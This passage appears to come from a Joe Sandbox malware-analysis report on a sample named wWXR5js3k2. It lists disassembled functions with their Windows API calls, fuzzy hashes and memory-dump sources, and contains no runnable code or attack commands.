                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 3bda61addd43b2793c406b087dc1428525cee64c354b0d65e04db09a586e924b
                                                    • Instruction ID: 0591b52e19f873531ded4c197dc501d6d542482e520c819493a9dbc1c093a606
                                                    • Opcode Fuzzy Hash: 3bda61addd43b2793c406b087dc1428525cee64c354b0d65e04db09a586e924b
                                                    • Instruction Fuzzy Hash: 1241E37190420AFFEB10DE95DC95FFB77EEEB40714F10806EFA09A6240EA749E419664
                                                    Function 006BB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BB343
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006BB39D
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006BB3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 3234ca737de88270296c6abbdc6b3f2da1482e17aed5647ecc73296ce06375f1
                                                    • Instruction ID: 5158d225004229b3f6f0712375d086ddc3bea495aedecb7b671baa81f55aaad9
                                                    • Opcode Fuzzy Hash: 3234ca737de88270296c6abbdc6b3f2da1482e17aed5647ecc73296ce06375f1
                                                    • Instruction Fuzzy Hash: AC218E75A00118EFCB00EFA5D880AEDBBB9FF49310F0480AAE905AB351CB319959CF54
                                                    Function 006A87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                    • GetLastError.KERNEL32 ref: 006A8865
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 5afc3e4bdcf345bbf401735777924ea2d10008cd335c01b516a98e9eca0e8bdb
                                                    • Instruction ID: df2556623bad41e2b36bdb113863f5a21e0f0d1f04da8a96974db7131a6ed744
                                                    • Opcode Fuzzy Hash: 5afc3e4bdcf345bbf401735777924ea2d10008cd335c01b516a98e9eca0e8bdb
                                                    • Instruction Fuzzy Hash: 90116DB2814305AFE728EFA4DC85D6BB7EEEB45710B20852EE45697241EE34AC418B60
                                                    Function 006A874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006A8774
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006A878B
                                                    • FreeSid.ADVAPI32(?), ref: 006A879B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
                                                    • Instruction ID: 7f798b351efe77609fe99f5d210c767f878b41c0a6b155323b2fe7c3a279456a
                                                    • Opcode Fuzzy Hash: 8cf72e1ded6df46f9ba779ed8265550c91f7bf0d1ead5dcace1145785ab7d5b2
                                                    • Instruction Fuzzy Hash: 6BF03C75D11208BFDB00DFE49C99ABDB7B9EF08201F504469A502E3281D6715A448B50
                                                    Function 006B8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __time64.LIBCMT ref: 006B889B
                                                      • Part of subcall function 0067520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006B8F6E,00000000,?,?,?,?,006B911F,00000000,?), ref: 00675213
                                                      • Part of subcall function 0067520A: __aulldiv.LIBCMT ref: 00675233
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID: 0eq
                                                    • API String ID: 2893107130-3835880138
                                                    • Opcode ID: a98b978b92b16fdb9ae34cce9932eab5c5188b8a17d967880557afe393c0156e
                                                    • Instruction ID: 33dad0db3af18aeae4b8990083fe260f6bc6e9904f11ba30890eafeb93ca4879
                                                    • Opcode Fuzzy Hash: a98b978b92b16fdb9ae34cce9932eab5c5188b8a17d967880557afe393c0156e
                                                    • Instruction Fuzzy Hash: 1C21B1726356108FC729CF29D841A92B3E6EFA5311B68CE6CD0F5CB2C0CA74B945CB58
                                                    Function 006B4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 006B4CB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 2434400541-711622031
                                                    • Opcode ID: 9b22f39b4765da049e97c9fe2d196eff4735547ec15ecec218cc73151595b66a
                                                    • Instruction ID: eb189b406e47b2ad15b3a53a541e82a3bb161f5175bd218dbc5c2c12ebdce255
                                                    • Opcode Fuzzy Hash: 9b22f39b4765da049e97c9fe2d196eff4735547ec15ecec218cc73151595b66a
                                                    • Instruction Fuzzy Hash: CAE086F219D7223CF9842618BC03EF7078D8B127357104246F814E51C2DE451CC325AC
                                                    Function 006BC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006BC6FB
                                                    • FindClose.KERNEL32(00000000), ref: 006BC72B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 0aea248f03a427cac685bb0ff3e9e5f36e9fccf0603880dee170dc3ff3a91a38
                                                    • Instruction ID: 5ca6a162d83e53a44d5c5ce7a572bd0d5c9cbb09a04a82351b058cd08ce62e7d
                                                    • Opcode Fuzzy Hash: 0aea248f03a427cac685bb0ff3e9e5f36e9fccf0603880dee170dc3ff3a91a38
                                                    • Instruction Fuzzy Hash: 5511A5716006009FDB10DF29C85596AF7E6FF45321F048A1EF9A5CB290DB30AD05CF95
                                                    Function 006BA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006C9468,?,006DFB84,?), ref: 006BA097
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006C9468,?,006DFB84,?), ref: 006BA0A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 95a1fa1c6802ed437b65b9bace52173c608e3171cdcc97b5b3f87274eefc5ab0
                                                    • Instruction ID: 7585e0d87ae6b484f5349f15577340a66f9a2d02f32f2fc71d1695a57a89490a
                                                    • Opcode Fuzzy Hash: 95a1fa1c6802ed437b65b9bace52173c608e3171cdcc97b5b3f87274eefc5ab0
                                                    • Instruction Fuzzy Hash: ADF0E23550522DBBDB20AFA4CC48FEA736EBF08361F00426AF809D6180C6309A40CBA1
                                                    Function 006A81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8309), ref: 006A81E0
                                                    • CloseHandle.KERNEL32(?,?,006A8309), ref: 006A81F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: fb4f6da4edc2c2d97be00caffaf7594b10e8dfda4dff16cf4fb484595e124c1e
                                                    • Instruction ID: 8fb14c99fb938b8f371fafa62ed6fe528a0834115e3f6530ce493bc8890342a7
                                                    • Opcode Fuzzy Hash: fb4f6da4edc2c2d97be00caffaf7594b10e8dfda4dff16cf4fb484595e124c1e
                                                    • Instruction Fuzzy Hash: FAE08C32001A11EFF7212B20EC08D737BEBEF00310714C82EF8AA80430CB22AC90DB60
                                                    Function 0067A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00678D57,?,?,?,00000001), ref: 0067A15A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0067A163
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
                                                    • Instruction ID: a56d2f2bf35eee2812ecab3a921bb16622b54cce86ecaa3eb58277901477a0f3
                                                    • Opcode Fuzzy Hash: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
                                                    • Instruction Fuzzy Hash: E7B09231455208ABCB002B95EC09B883F6AEB44AA2F429022F60E84060CF6254508AD1
                                                    Function 0067F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
                                                    • Instruction ID: 9ebdd5fe2498d872a538d9fe57ce59f46a1302b8b8de9e3017cd9be10f5d5e8c
                                                    • Opcode Fuzzy Hash: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
                                                    • Instruction Fuzzy Hash: 46321622D29F414DD7639A34D872336A25AAFB73C4F15D737F81AB9AA5EB29C4834100
                                                    Function 0068242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
                                                    • Instruction ID: 607cb2262753a5e12b1efd27226981a15b6f292d608780ae00d5a5dd78c5f99e
                                                    • Opcode Fuzzy Hash: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
                                                    • Instruction Fuzzy Hash: 6BB12330D2AF814DD32396398871336B69DAFBB2C5F52E71BFC1674D62EB2195834241
                                                    Function 006A87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006A8389), ref: 006A87D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
                                                    • Instruction ID: 18e9a6d304c3c2378e32407b3a82ab543a13499a195027a6d8f3d7b10c41c67c
                                                    • Opcode Fuzzy Hash: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
                                                    • Instruction Fuzzy Hash: 22D09E3226450EABEF019FA4DD05EBE3B6AEB04B01F408511FE16D61A1C775D935AB60
                                                    Function 0067A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0067A12A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
                                                    • Instruction ID: 5a25bd8b95388497204cc55ae1577e614ddf8e814b5708a76a623ee28e9d0870
                                                    • Opcode Fuzzy Hash: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
                                                    • Instruction Fuzzy Hash: A9A0243000010CF7CF001F45FC044447F5DD7001D07014031F40D40031CF33541045C0
                                                    Function 00668808 Relevance: .6, Instructions: 590COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2197d48d5c3b414a40d71d7f1562e00bf1634dd0239b765c534867b631d072bd
                                                    • Instruction ID: b88e6ade24b050ed4807a9352bde134eb63584e7aa57eb0aff1f51d43b313bf0
                                                    • Opcode Fuzzy Hash: 2197d48d5c3b414a40d71d7f1562e00bf1634dd0239b765c534867b631d072bd
                                                    • Instruction Fuzzy Hash: 34223530A04506CFDF28DA78C4947BC77A3FF42344F28836BE9469B692DB759D92CA41
                                                    Function 006721C5 Relevance: .3, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 23cc42bcfd0f5f3b85442975d40a2d3e066c059c75d65d5c6bead454d2901792
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: 0FC185322050930ADF2D463DC4750BEBBA25EA37B131A975ED4BBCF2D5EE10C965D620
                                                    Function 006725FA Relevance: .3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 3e887c24c0f461381d7697b296991d9c6917d4242e11780e523e4f1ab158333f
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 6DC1A8322051930ADF2D463EC43507EBBA25EA37B131A576ED4BBDF2D4EE20C925D620
                                                    Function 00671978 Relevance: .3, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: 22c2e48820d6fe1f846c86f9bb9f02a7d0699e0dd59e91c03ee8927eefdfc4bd
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 6FC184322051930ADF2D463D84751BEBAA25EA37B131A975FD4BADF2C4FE20C925DA10
                                                    Function 032D35D0 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                    • Instruction ID: 0cd52ee6d37e09923d1cc01da92376dcd0e44fac7000d199ef04f541cefc9962
                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
